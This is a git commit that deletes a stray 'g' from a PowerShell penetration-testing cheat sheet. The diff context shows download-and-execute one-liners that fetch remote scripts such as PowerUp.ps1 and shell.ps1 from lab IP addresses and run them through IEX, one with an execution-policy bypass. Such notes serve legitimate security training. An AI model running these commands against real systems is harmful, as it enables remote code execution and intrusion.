Fix g typo introduced in 2d9f506e60

This commit is contained in:
Neved4 2025-01-14 22:53:39 +01:00
parent d13f1d6355
commit 700af4726a

View File

@ -23,7 +23,6 @@ Get-Command -Module <modulename>
## Download & Execute
```powershell
g
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3